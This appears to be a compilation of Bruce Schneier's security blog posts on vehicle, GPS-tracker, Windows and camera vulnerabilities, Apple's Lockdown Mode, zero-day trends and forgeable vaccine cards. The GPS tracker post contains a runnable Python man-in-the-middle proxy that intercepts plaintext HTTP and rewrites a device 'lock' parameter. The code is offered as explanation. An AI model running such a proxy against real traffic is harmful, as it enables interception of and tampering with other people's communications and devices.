
    Critical Microsoft Code-Execution Vulnerability

    news.movim.eu / Schneier · Wednesday, 21 December - 19:03 · 1 minute

A critical code-execution vulnerability in Microsoft Windows was patched in September. It seems that researchers just realized how serious it was (and is):

Like EternalBlue, CVE-2022-37958, as the latest vulnerability is tracked, allows attackers to execute malicious code with no authentication required. Also, like EternalBlue, it’s wormable, meaning that a single exploit can trigger a chain reaction of self-replicating follow-on exploits on other vulnerable systems. The wormability of EternalBlue allowed WannaCry and several other attacks to spread across the world in a matter of minutes with no user interaction required.

But unlike EternalBlue, which could be exploited when using only the SMB, or server message block, a protocol for file and printer sharing and similar network activities, this latest vulnerability is present in a much broader range of network protocols, giving attackers more flexibility than they had when exploiting the older vulnerability.

[…]

Microsoft fixed CVE-2022-37958 in September during its monthly Patch Tuesday rollout of security fixes. At the time, however, Microsoft researchers believed the vulnerability allowed only the disclosure of potentially sensitive information. As such, Microsoft gave the vulnerability a designation of “important.” In the routine course of analyzing vulnerabilities after they’re patched, Palmiotti discovered it allowed for remote code execution in much the way EternalBlue did. Last week, Microsoft revised the designation to critical and gave it a severity rating of 8.1, the same given to EternalBlue.


    Sirius XM Software Vulnerability

    news.movim.eu / Schneier · Thursday, 1 December - 15:10

This is new:

Newly revealed research shows that a number of major car brands, including Honda, Nissan, Infiniti, and Acura, were affected by a previously undisclosed security bug that would have allowed a savvy hacker to hijack vehicles and steal user data. According to researchers, the bug was in the car’s Sirius XM telematics infrastructure and would have allowed a hacker to remotely locate a vehicle, unlock and start it, flash the lights, honk the horn, pop the trunk, and access sensitive customer info like the owner’s name, phone number, address, and vehicle details.

Cars are just computers with four wheels and an engine. It’s no surprise that the software is vulnerable, and that everything is connected.


    Relay Attack against Teslas

    news.movim.eu / Schneier · Thursday, 15 September - 15:28 · 1 minute

Nice work:

Radio relay attacks are technically complicated to execute, but conceptually easy to understand: attackers simply extend the range of your existing key using what is essentially a high-tech walkie-talkie. One thief stands near you while you’re in the grocery store, intercepting your key’s transmitted signal with a radio transceiver. Another stands near your car, with another transceiver, taking the signal from their friend and passing it on to the car. Since the car and the key can now talk, through the thieves’ range extenders, the car has no reason to suspect the key isn’t inside—and fires right up.

But Tesla’s credit card keys, like many digital keys stored in cell phones, don’t work via radio. Instead, they rely on a different protocol called Near Field Communication or NFC. Those keys had previously been seen as more secure, since their range is so limited and their handshakes with cars are more complex.

Now, researchers seem to have cracked the code. By reverse-engineering the communications between a Tesla Model Y and its credit card key, they were able to properly execute a range-extending relay attack against the crossover. While this specific use case focuses on Tesla, it’s a proof of concept—NFC handshakes can, and eventually will, be reverse-engineered.
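To make the relay concrete, here is a minimal, hypothetical Python sketch of a challenge-response unlock. It is not Tesla’s (or any vendor’s) real protocol; it only shows why the cryptography verifies correctly even when the key is nowhere near the car, because nothing in the exchange bounds distance or round-trip time. That property is what a relay exploits, whether the link is radio or NFC.

```python
import hashlib
import hmac
import os

# Hypothetical toy model of a passive-entry handshake: the car issues a
# random challenge, the key answers with an HMAC over it, and the car
# unlocks if the answer verifies. Not any real vendor's protocol.

SHARED_SECRET = b"demo-key-material"  # provisioned into both car and key fob

def car_challenge() -> bytes:
    return os.urandom(16)

def key_respond(challenge: bytes) -> bytes:
    return hmac.new(SHARED_SECRET, challenge, hashlib.sha256).digest()

def car_verify(challenge: bytes, response: bytes) -> bool:
    expected = hmac.new(SHARED_SECRET, challenge, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)

def relay(message: bytes) -> bytes:
    # The attackers' "high-tech walkie-talkie": a transparent pipe that
    # forwards whatever it receives, over as much distance as they like.
    return message

# One attacker stands by the car, the other by the owner; they forward the
# handshake between the two. The crypto checks out, so the car unlocks.
challenge = car_challenge()
response = key_respond(relay(challenge))   # legitimate key answers, unaware
print("car unlocks:", car_verify(challenge, relay(response)))  # -> True
```

Defenses along the lines of distance bounding or strict latency checks work by rejecting answers that arrive too slowly, a delay the relay cannot avoid adding.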


    Apple’s Lockdown Mode

    news.movim.eu / Schneier · Sunday, 31 July, 2022 - 18:21 · 1 minute

I haven’t written about Apple’s Lockdown Mode yet, mostly because I haven’t delved into the details. This is how Apple describes it:

Lockdown Mode offers an extreme, optional level of security for the very few users who, because of who they are or what they do, may be personally targeted by some of the most sophisticated digital threats, such as those from NSO Group and other private companies developing state-sponsored mercenary spyware. Turning on Lockdown Mode in iOS 16, iPadOS 16, and macOS Ventura further hardens device defenses and strictly limits certain functionalities, sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware.

At launch, Lockdown Mode includes the following protections:

  • Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
  • Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
  • Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
  • Wired connections with a computer or accessory are blocked when iPhone is locked.
  • Configuration profiles cannot be installed, and the device cannot enroll into mobile device management (MDM), while Lockdown Mode is turned on.

What Apple has done here is really interesting. It’s common to trade security off for usability, and the results of that are all over Apple’s operating systems—and everywhere else on the Internet. What they’re doing with Lockdown Mode is the reverse: they’re trading usability for security. The result is a user experience with fewer features, but a much smaller attack surface. And they aren’t just removing random features; they’re removing features that are common attack vectors.

There aren’t a lot of people who need Lockdown Mode, but it’s an excellent option for those who do.

News article.

EDITED TO ADD (7/31): An analysis of the effect of Lockdown Mode on Safari.


    Critical Vulnerabilities in GPS Trackers

    news.movim.eu / Schneier · Thursday, 21 July, 2022 - 13:36 · 1 minute

This is a dangerous vulnerability:

An assessment from security firm BitSight found six vulnerabilities in the Micodus MV720, a GPS tracker that sells for about $20 and is widely available. The researchers who performed the assessment believe the same critical vulnerabilities are present in other Micodus tracker models. The China-based manufacturer says 1.5 million of its tracking devices are deployed across 420,000 customers. BitSight found the device in use in 169 countries, with customers including governments, militaries, law enforcement agencies, and aerospace, shipping, and manufacturing companies.

BitSight discovered what it said were six “severe” vulnerabilities in the device that allow for a host of possible attacks. One flaw is the use of unencrypted HTTP communications that makes it possible for remote hackers to conduct adversary-in-the-middle attacks that intercept or change requests sent between the mobile application and supporting servers. Other vulnerabilities include a flawed authentication mechanism in the mobile app that can allow attackers to access the hardcoded key for locking down the trackers and the ability to use a custom IP address that makes it possible for hackers to monitor and control all communications to and from the device.

The security firm said it first contacted Micodus in September to notify company officials of the vulnerabilities. BitSight and CISA finally went public with the findings on Tuesday after trying for months to privately engage with the manufacturer. As of the time of writing, all of the vulnerabilities remain unpatched and unmitigated.
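The unencrypted-HTTP finding is the easiest of these to picture. Below is a minimal, hypothetical Python sketch of what an on-path adversary can do to plaintext traffic; the upstream host and the `lock=1` parameter are invented for illustration and are not Micodus’s real API. The point is only that without TLS, anyone positioned between the app and the server can read and rewrite every request.

```python
import socket
import threading

# A minimal, hypothetical sketch of an adversary-in-the-middle against
# plaintext HTTP. It is not Micodus-specific: it relays TCP between a
# client and an upstream server and tampers with bytes in transit, which
# is exactly what unencrypted transport permits and what TLS (with
# certificate validation) is designed to prevent.

UPSTREAM = ("tracker.example.com", 80)  # hypothetical upstream API host
LISTEN = ("127.0.0.1", 8080)            # victim traffic is routed through here

def pump(src: socket.socket, dst: socket.socket, tamper: bool) -> None:
    """Copy bytes from src to dst, optionally reading and rewriting them."""
    while True:
        data = src.recv(4096)
        if not data:
            break
        if tamper:
            # The attacker sees credentials, device IDs, and commands in the clear...
            print("intercepted:", data[:80])
            # ...and can rewrite them; 'lock=1' is a made-up parameter name.
            data = data.replace(b"lock=1", b"lock=0")
        dst.sendall(data)

def handle(client: socket.socket) -> None:
    upstream = socket.create_connection(UPSTREAM)
    # Relay both directions; only the client->server leg is tampered with here.
    threading.Thread(target=pump, args=(upstream, client, False), daemon=True).start()
    pump(client, upstream, True)
    client.close()
    upstream.close()

with socket.socket() as listener:
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(LISTEN)
    listener.listen()
    while True:
        conn, _ = listener.accept()
        threading.Thread(target=handle, args=(conn,), daemon=True).start()
```

Transport encryption with certificate validation closes this particular hole, though it does nothing about the hardcoded key or the flawed authentication mechanism also described above.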

These are computers and computer vulnerabilities, but because the computers are attached to cars, the vulnerabilities become potentially life-threatening. CISA writes:

These vulnerabilities could impact access to a vehicle fuel supply, vehicle control, or allow locational surveillance of vehicles in which the device is installed.

I wouldn’t have buried “vehicle control” in the middle of that sentence.


    Zero-Day Vulnerabilities Are on the Rise

    news.movim.eu / Schneier · Wednesday, 27 April, 2022 - 18:40 · 1 minute

Both Google and Mandiant are reporting a significant increase in the number of zero-day vulnerabilities reported in 2021.

Google:

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

Mandiant:

In 2021, Mandiant Threat Intelligence identified 80 zero-days exploited in the wild, which is more than double the previous record volume in 2019. State-sponsored groups continue to be the primary actors exploiting zero-day vulnerabilities, led by Chinese groups. The proportion of financially motivated actors—particularly ransomware groups—deploying zero-day exploits also grew significantly, and nearly 1 in 3 identified actors exploiting zero-days in 2021 was financially motivated. Threat actors exploited zero-days in Microsoft, Apple, and Google products most frequently, likely reflecting the popularity of these vendors. The vast increase in zero-day exploitation in 2021, as well as the diversification of actors using them, expands the risk portfolio for organizations in nearly every industry sector and geography, particularly those that rely on these popular systems.

News article.


    Wyze Camera Vulnerability

    news.movim.eu / Schneier · Thursday, 31 March, 2022 - 19:36

Wyze ignored a vulnerability in its home security cameras for three years. Bitdefender, who discovered the vulnerability, let the company get away with it.

In case you’re wondering, no, that is not normal in the security community. While experts tell me that the concept of a “responsible disclosure timeline” is a little outdated and heavily depends on the situation, we’re generally measuring in days, not years. “The majority of researchers have policies where if they make a good faith effort to reach a vendor and don’t get a response, that they publicly disclose in 30 days,” Alex Stamos, director of the Stanford Internet Observatory and former chief security officer at Facebook, tells me.


    Why Vaccine Cards Are So Easily Forged

    news.movim.eu / Schneier · Thursday, 17 March, 2022 - 20:41 · 4 minutes

My proof of COVID-19 vaccination is recorded on an easy-to-forge paper card. With little trouble, I could print a blank form, fill it out, and snap a photo. Small imperfections wouldn’t pose any problem; you can’t see whether the paper’s weight is right in a digital image. When I fly internationally, I have to show a negative COVID-19 test result. That, too, would be easy to fake. I could change the date on an old test, or put my name on someone else’s test, or even just make something up on my computer. After all, there’s no standard format for test results; airlines accept anything that looks plausible.

After a career spent in cybersecurity, this is just how my mind works: I find vulnerabilities in everything I see. When it comes to the measures intended to keep us safe from COVID-19, I don’t even have to look very hard. But I’m not alarmed. The fact that these measures are flawed is precisely why they’re going to be so helpful in getting us past the pandemic.

Back in 2003, at the height of our collective terrorism panic, I coined the term security theater to describe measures that look like they’re doing something but aren’t. We did a lot of security theater back then: ID checks to get into buildings, even though terrorists have IDs; random bag searches in subway stations, forcing terrorists to walk to the next station; airport bans on containers with more than 3.4 ounces of liquid, which can be recombined into larger bottles on the other side of security. At first glance, asking people for photos of easily forged pieces of paper or printouts of readily faked test results might look like the same sort of security theater. There’s an important difference, though, between the most effective strategies for preventing terrorism and those for preventing COVID-19 transmission.

Security measures fail in one of two ways: Either they can’t stop a bad actor from doing a bad thing, or they block an innocent person from doing an innocuous thing. Sometimes one is more important than the other. When it comes to attacks that have catastrophic effects—say, launching nuclear missiles—we want the security to stop all bad actors, even at the expense of usability. But when we’re talking about milder attacks, the balance is less obvious. Sure, banks want credit cards to be impervious to fraud, but if the security measures also regularly prevent us from using our own credit cards, we would rebel and banks would lose money. So banks often put ease of use ahead of security.

That’s how we should think about COVID-19 vaccine cards and test documentation. We’re not looking for perfection. If most everyone follows the rules and doesn’t cheat, we win. Making these systems easy to use is the priority. The alternative just isn’t worth it.

I design computer security systems for a living. Given the challenge, I could design a system of vaccine and test verification that makes cheating very hard. I could issue cards that are as unforgeable as passports, or create phone apps that are linked to highly secure centralized databases. I could build a massive surveillance apparatus and enforce the sorts of strict containment measures used in China’s zero-COVID-19 policy. But the costs—in money, in liberty, in privacy—are too high. We can get most of the benefits with some pieces of paper and broad, but not universal, compliance with the rules.

It also helps that many of the people who break the rules are so very bad at it. Every story of someone getting arrested for faking a vaccine card, or selling a fake, makes it less likely that the next person will cheat. Every traveler arrested for faking a COVID-19 test does the same thing. When a famous athlete such as Novak Djokovic gets caught lying about his past COVID-19 diagnosis when trying to enter Australia, others conclude that they shouldn’t try lying themselves.

Our goal should be to impose the best policies that we can, given the trade-offs. The small number of cheaters isn’t going to be a public-health problem. I don’t even care if they feel smug about cheating the system. The system is resilient; it can withstand some cheating.

Last month, I visited New York City, where restrictions that are now being lifted were then still in effect. Every restaurant and cocktail bar I went to verified the photo of my vaccine card that I keep on my phone, and at least pretended to compare the name on that card with the one on my photo ID. I felt a lot safer in those restaurants because of that security theater, even if a few of my fellow patrons cheated.

This essay previously appeared in the Atlantic.